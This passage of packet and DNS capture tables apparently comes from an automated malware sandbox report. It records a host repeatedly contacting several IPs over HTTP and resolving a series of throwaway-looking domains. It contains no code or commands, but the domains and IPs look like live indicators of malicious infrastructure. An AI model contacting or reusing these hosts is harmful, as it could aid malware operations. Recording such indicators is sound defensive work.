                          Sep 23, 2024 14:55:16.742412090 CEST80497543.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:17.214919090 CEST80497543.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:17.215703964 CEST80497543.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:17.215770006 CEST4975480192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:17.238604069 CEST4975480192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:17.243586063 CEST80497543.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:23.052792072 CEST4975580192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:23.057744026 CEST8049755183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:23.057867050 CEST4975580192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:23.067734003 CEST4975580192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:23.072562933 CEST8049755183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:24.056519985 CEST8049755183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:24.056585073 CEST8049755183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:24.056619883 CEST8049755183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:24.056669950 CEST8049755183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:24.056701899 CEST8049755183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:24.056704044 CEST4975580192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:24.056735992 CEST8049755183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:24.056765079 CEST8049755183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:24.056767941 CEST4975580192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:24.056796074 CEST8049755183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:24.056828976 CEST4975580192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:24.057735920 CEST4975580192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:24.577214003 CEST4975580192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:25.597619057 CEST4975680192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:25.696379900 CEST8049756183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:25.699570894 CEST4975680192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:25.714592934 CEST4975680192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:25.719510078 CEST8049756183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:26.580348969 CEST8049756183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:26.580399990 CEST8049756183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:26.580435038 CEST8049756183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:26.580472946 CEST8049756183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:26.580467939 CEST4975680192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:26.580508947 CEST8049756183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:26.580550909 CEST4975680192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:26.580626965 CEST8049756183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:26.580678940 CEST4975680192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:26.580735922 CEST8049756183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:26.580790997 CEST4975680192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:27.217895031 CEST4975680192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:28.238085032 CEST4975780192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:28.243304014 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:28.245650053 CEST4975780192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:28.257477999 CEST4975780192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:28.262463093 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:28.262603998 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:28.262634039 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:28.262660980 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:28.262691021 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:28.262803078 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:28.262830973 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:28.262856960 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:28.262885094 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:29.303375006 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:29.303478956 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:29.303524017 CEST4975780192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:29.303539991 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:29.303577900 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:29.303611994 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:29.303622961 CEST4975780192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:29.303647041 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:29.303678989 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:29.303685904 CEST4975780192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:29.303723097 CEST8049757183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:29.303764105 CEST4975780192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:29.765592098 CEST4975780192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:30.784883022 CEST4975880192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:30.789921999 CEST8049758183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:30.790020943 CEST4975880192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:30.798523903 CEST4975880192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:30.803451061 CEST8049758183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:31.624186039 CEST8049758183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:31.624274015 CEST8049758183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:31.624439955 CEST4975880192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:31.629488945 CEST4975880192.168.2.4183.181.83.131
                          Sep 23, 2024 14:55:31.634318113 CEST8049758183.181.83.131192.168.2.4
                          Sep 23, 2024 14:55:36.825450897 CEST4975980192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:36.830444098 CEST804975938.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:36.830512047 CEST4975980192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:36.842179060 CEST4975980192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:36.847371101 CEST804975938.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:37.777416945 CEST804975938.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:37.778367996 CEST804975938.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:37.783709049 CEST4975980192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:38.358531952 CEST4975980192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:39.376784086 CEST4976080192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:39.381987095 CEST804976038.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:39.382065058 CEST4976080192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:39.392600060 CEST4976080192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:39.397545099 CEST804976038.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:40.297420979 CEST804976038.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:40.297477007 CEST804976038.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:40.297601938 CEST4976080192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:40.905442953 CEST4976080192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:41.924330950 CEST4976180192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:41.929404020 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:41.929737091 CEST4976180192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:41.941613913 CEST4976180192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:41.946686029 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:41.946707010 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:41.946741104 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:41.946754932 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:41.946768045 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:41.946800947 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:41.946847916 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:41.946861982 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:41.946878910 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:42.895127058 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:42.936675072 CEST4976180192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:43.124836922 CEST804976138.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:43.124918938 CEST4976180192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:43.452383041 CEST4976180192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:44.471451998 CEST4976280192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:44.476599932 CEST804976238.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:44.476752996 CEST4976280192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:44.483935118 CEST4976280192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:44.488830090 CEST804976238.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:45.467659950 CEST804976238.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:45.467684984 CEST804976238.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:45.467837095 CEST4976280192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:45.470330954 CEST4976280192.168.2.438.47.232.196
                          Sep 23, 2024 14:55:45.475235939 CEST804976238.47.232.196192.168.2.4
                          Sep 23, 2024 14:55:50.515418053 CEST4976380192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:50.520469904 CEST80497633.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:50.520602942 CEST4976380192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:50.531589031 CEST4976380192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:50.536556005 CEST80497633.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:50.984558105 CEST80497633.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:50.984622002 CEST4976380192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:52.046623945 CEST4976380192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:52.051625013 CEST80497633.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:53.065469027 CEST4976480192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:53.072647095 CEST80497643.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:53.072742939 CEST4976480192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:53.084821939 CEST4976480192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:53.090711117 CEST80497643.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:54.458704948 CEST80497643.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:54.458853006 CEST4976480192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:54.611706018 CEST4976480192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:54.616714954 CEST80497643.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:55.627605915 CEST4976580192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:55.632874966 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:55.635683060 CEST4976580192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:55.647617102 CEST4976580192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:55.653330088 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:55.653362036 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:55.653419971 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:55.653448105 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:55.653476000 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:55.654309988 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:55.654412031 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:55.654439926 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:55.654468060 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:56.091536999 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:56.091682911 CEST4976580192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:57.155538082 CEST4976580192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:57.160511017 CEST80497653.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:58.175595045 CEST4976680192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:58.180615902 CEST80497663.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:58.180738926 CEST4976680192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:58.189755917 CEST4976680192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:58.195780993 CEST80497663.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:58.639041901 CEST80497663.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:58.639154911 CEST80497663.33.130.190192.168.2.4
                          Sep 23, 2024 14:55:58.639204979 CEST4976680192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:58.641629934 CEST4976680192.168.2.43.33.130.190
                          Sep 23, 2024 14:55:58.646343946 CEST80497663.33.130.190192.168.2.4
                          Sep 23, 2024 14:56:04.113687992 CEST4976780192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:04.118629932 CEST8049767154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:04.118736029 CEST4976780192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:04.129734039 CEST4976780192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:04.134624004 CEST8049767154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:05.209104061 CEST8049767154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:05.209131002 CEST8049767154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:05.209177017 CEST8049767154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:05.209182978 CEST4976780192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:05.209235907 CEST4976780192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:05.640053034 CEST4976780192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:06.659121037 CEST4976880192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:06.664088964 CEST8049768154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:06.664166927 CEST4976880192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:06.679785013 CEST4976880192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:06.684756041 CEST8049768154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:07.556473970 CEST8049768154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:07.556528091 CEST8049768154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:07.556608915 CEST4976880192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:08.186830997 CEST4976880192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:09.205607891 CEST4976980192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:09.210515022 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:09.210588932 CEST4976980192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:09.221528053 CEST4976980192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:09.226562977 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:09.226594925 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:09.226624012 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:09.226665974 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:09.226694107 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:09.226746082 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:09.226772070 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:09.226830006 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:09.226857901 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:10.089875937 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:10.189076900 CEST4976980192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:10.308979988 CEST8049769154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:10.309072018 CEST4976980192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:10.734038115 CEST4976980192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:11.753683090 CEST4977080192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:11.759347916 CEST8049770154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:11.761796951 CEST4977080192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:11.767707109 CEST4977080192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:11.773550987 CEST8049770154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:12.638084888 CEST8049770154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:12.638535023 CEST8049770154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:12.638591051 CEST4977080192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:12.640661001 CEST4977080192.168.2.4154.212.219.2
                          Sep 23, 2024 14:56:12.645541906 CEST8049770154.212.219.2192.168.2.4
                          Sep 23, 2024 14:56:18.983016014 CEST4977180192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:18.987912893 CEST8049771133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:18.987983942 CEST4977180192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:19.000577927 CEST4977180192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:19.005559921 CEST8049771133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:19.783165932 CEST8049771133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:19.785546064 CEST8049771133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:19.785777092 CEST4977180192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:20.515017033 CEST4977180192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:21.540546894 CEST4977280192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:21.545744896 CEST8049772133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:21.545823097 CEST4977280192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:21.556082964 CEST4977280192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:21.561151981 CEST8049772133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:22.341589928 CEST8049772133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:22.341654062 CEST8049772133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:22.341965914 CEST4977280192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:23.061880112 CEST4977280192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:24.102750063 CEST4977380192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:24.107927084 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.108184099 CEST4977380192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:24.179765940 CEST4977380192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:24.184850931 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.184912920 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.184942007 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.184972048 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.185019970 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.185071945 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.185100079 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.185127020 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.185158014 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.915493965 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.915518045 CEST8049773133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:24.915586948 CEST4977380192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:25.687357903 CEST4977380192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:26.713697910 CEST4977480192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:26.718862057 CEST8049774133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:26.718951941 CEST4977480192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:26.730726957 CEST4977480192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:26.735649109 CEST8049774133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:27.499661922 CEST8049774133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:27.500261068 CEST8049774133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:27.500320911 CEST4977480192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:27.504436970 CEST4977480192.168.2.4133.130.35.90
                          Sep 23, 2024 14:56:27.509280920 CEST8049774133.130.35.90192.168.2.4
                          Sep 23, 2024 14:56:32.771934986 CEST4977580192.168.2.43.33.130.190
                          Sep 23, 2024 14:56:32.776863098 CEST80497753.33.130.190192.168.2.4
                          Sep 23, 2024 14:56:32.777008057 CEST4977580192.168.2.43.33.130.190
                          Sep 23, 2024 14:56:32.788366079 CEST4977580192.168.2.43.33.130.190
                          Sep 23, 2024 14:56:32.793251991 CEST80497753.33.130.190192.168.2.4
                          Sep 23, 2024 14:56:33.252293110 CEST80497753.33.130.190192.168.2.4
                          Sep 23, 2024 14:56:33.252343893 CEST4977580192.168.2.43.33.130.190
                          Sep 23, 2024 14:56:34.733839035 CEST4977580192.168.2.43.33.130.190
                          Sep 23, 2024 14:56:34.738652945 CEST80497753.33.130.190192.168.2.4
                          Sep 23, 2024 14:56:35.752199888 CEST4977680192.168.2.43.33.130.190
                          Sep 23, 2024 14:56:35.757224083 CEST80497763.33.130.190192.168.2.4
                          Sep 23, 2024 14:56:35.757324934 CEST4977680192.168.2.43.33.130.190
                          Sep 23, 2024 14:56:35.767796993 CEST4977680192.168.2.43.33.130.190
                          Sep 23, 2024 14:56:35.772679090 CEST80497763.33.130.190192.168.2.4
                          Sep 23, 2024 14:56:36.212193966 CEST80497763.33.130.190192.168.2.4
                          Sep 23, 2024 14:56:36.212264061 CEST4977680192.168.2.43.33.130.190
                          TimestampSource PortDest PortSource IPDest IP
                          Sep 23, 2024 14:54:12.096615076 CEST5996253192.168.2.41.1.1.1
                          Sep 23, 2024 14:54:12.106626034 CEST53599621.1.1.1192.168.2.4
                          Sep 23, 2024 14:54:28.330362082 CEST5731753192.168.2.41.1.1.1
                          Sep 23, 2024 14:54:28.755474091 CEST53573171.1.1.1192.168.2.4
                          Sep 23, 2024 14:54:42.441380978 CEST6504053192.168.2.41.1.1.1
                          Sep 23, 2024 14:54:42.467422962 CEST53650401.1.1.1192.168.2.4
                          Sep 23, 2024 14:54:55.815087080 CEST5128853192.168.2.41.1.1.1
                          Sep 23, 2024 14:54:55.895967007 CEST53512881.1.1.1192.168.2.4
                          Sep 23, 2024 14:55:09.020005941 CEST5632053192.168.2.41.1.1.1
                          Sep 23, 2024 14:55:09.032597065 CEST53563201.1.1.1192.168.2.4
                          Sep 23, 2024 14:55:22.252887964 CEST5794153192.168.2.41.1.1.1
                          Sep 23, 2024 14:55:23.050506115 CEST53579411.1.1.1192.168.2.4
                          Sep 23, 2024 14:55:36.643522978 CEST5616253192.168.2.41.1.1.1
                          Sep 23, 2024 14:55:36.822793961 CEST53561621.1.1.1192.168.2.4
                          Sep 23, 2024 14:55:50.497936010 CEST6087353192.168.2.41.1.1.1
                          Sep 23, 2024 14:55:50.512860060 CEST53608731.1.1.1192.168.2.4
                          Sep 23, 2024 14:56:03.722135067 CEST5622453192.168.2.41.1.1.1
                          Sep 23, 2024 14:56:04.111285925 CEST53562241.1.1.1192.168.2.4
                          Sep 23, 2024 14:56:17.662626982 CEST6101653192.168.2.41.1.1.1
                          Sep 23, 2024 14:56:18.655742884 CEST6101653192.168.2.41.1.1.1
                          Sep 23, 2024 14:56:18.980065107 CEST53610161.1.1.1192.168.2.4
                          Sep 23, 2024 14:56:18.980117083 CEST53610161.1.1.1192.168.2.4
                          Sep 23, 2024 14:56:32.521909952 CEST4959753192.168.2.41.1.1.1
                          Sep 23, 2024 14:56:32.769280910 CEST53495971.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Sep 23, 2024 14:54:12.096615076 CEST192.168.2.41.1.1.10xc430Standard query (0)www.newdaydawning.netA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:54:28.330362082 CEST192.168.2.41.1.1.10x788eStandard query (0)www.40wxd.topA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:54:42.441380978 CEST192.168.2.41.1.1.10x4ea0Standard query (0)www.uburn.xyzA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:54:55.815087080 CEST192.168.2.41.1.1.10xde58Standard query (0)www.i16zb920d.cfdA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:55:09.020005941 CEST192.168.2.41.1.1.10xdb34Standard query (0)www.o731lh.vipA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:55:22.252887964 CEST192.168.2.41.1.1.10xd4edStandard query (0)www.nakama2-sshl.xyzA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:55:36.643522978 CEST192.168.2.41.1.1.10xd128Standard query (0)www.zz82x.topA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:55:50.497936010 CEST192.168.2.41.1.1.10x5d4Standard query (0)www.tukaari.shopA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:56:03.722135067 CEST192.168.2.41.1.1.10x4aecStandard query (0)www.prj81oqde1.buzzA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:56:17.662626982 CEST192.168.2.41.1.1.10x9581Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:56:18.655742884 CEST192.168.2.41.1.1.10x9581Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
                          Sep 23, 2024 14:56:32.521909952 CEST192.168.2.41.1.1.10xcd2eStandard query (0)www.healthyloveforall.netA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Sep 23, 2024 14:54:12.106626034 CEST1.1.1.1192.168.2.40xc430No error (0)www.newdaydawning.netnewdaydawning.netCNAME (Canonical name)IN (0x0001)false
                          Sep 23, 2024 14:54:12.106626034 CEST1.1.1.1192.168.2.40xc430No error (0)newdaydawning.net44.213.25.70A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:54:28.755474091 CEST1.1.1.1192.168.2.40x788eNo error (0)www.40wxd.top40wxd.topCNAME (Canonical name)IN (0x0001)false
                          Sep 23, 2024 14:54:28.755474091 CEST1.1.1.1192.168.2.40x788eNo error (0)40wxd.top206.119.82.134A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:54:42.467422962 CEST1.1.1.1192.168.2.40x4ea0No error (0)www.uburn.xyz67.223.117.189A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:54:55.895967007 CEST1.1.1.1192.168.2.40xde58No error (0)www.i16zb920d.cfd94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                          Sep 23, 2024 14:54:55.895967007 CEST1.1.1.1192.168.2.40xde58No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:55:09.032597065 CEST1.1.1.1192.168.2.40xdb34No error (0)www.o731lh.vipo731lh.vipCNAME (Canonical name)IN (0x0001)false
                          Sep 23, 2024 14:55:09.032597065 CEST1.1.1.1192.168.2.40xdb34No error (0)o731lh.vip3.33.130.190A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:55:09.032597065 CEST1.1.1.1192.168.2.40xdb34No error (0)o731lh.vip15.197.148.33A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:55:23.050506115 CEST1.1.1.1192.168.2.40xd4edNo error (0)www.nakama2-sshl.xyz183.181.83.131A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:55:36.822793961 CEST1.1.1.1192.168.2.40xd128No error (0)www.zz82x.topzz82x.topCNAME (Canonical name)IN (0x0001)false
                          Sep 23, 2024 14:55:36.822793961 CEST1.1.1.1192.168.2.40xd128No error (0)zz82x.top38.47.232.196A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:55:50.512860060 CEST1.1.1.1192.168.2.40x5d4No error (0)www.tukaari.shoptukaari.shopCNAME (Canonical name)IN (0x0001)false
